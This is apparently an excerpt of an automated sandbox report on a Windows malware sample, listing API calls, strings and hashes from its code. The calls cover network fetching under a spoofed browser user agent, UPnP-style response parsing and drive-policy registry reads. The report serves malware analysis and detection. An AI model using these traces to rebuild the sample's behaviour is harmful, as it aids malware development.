                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3956458805-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                                                                                                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                                                                                                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 1457358591-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                                                                                                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                                                                                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                                                                                                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                                                                                                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                                                                                                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                                                                                                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                                                                                                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                                                                                                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                                                                                                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                                                                                                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                                                                                                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 442028454-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                                                                                                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                                                                                    • String ID: %s%s
                                                                                                                                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                                                                                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                                                                                                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                                                                                                                                                                                                    • NoDrives, xrefs: 00406418
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                                                                                                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                                                                                                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                                                                                                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
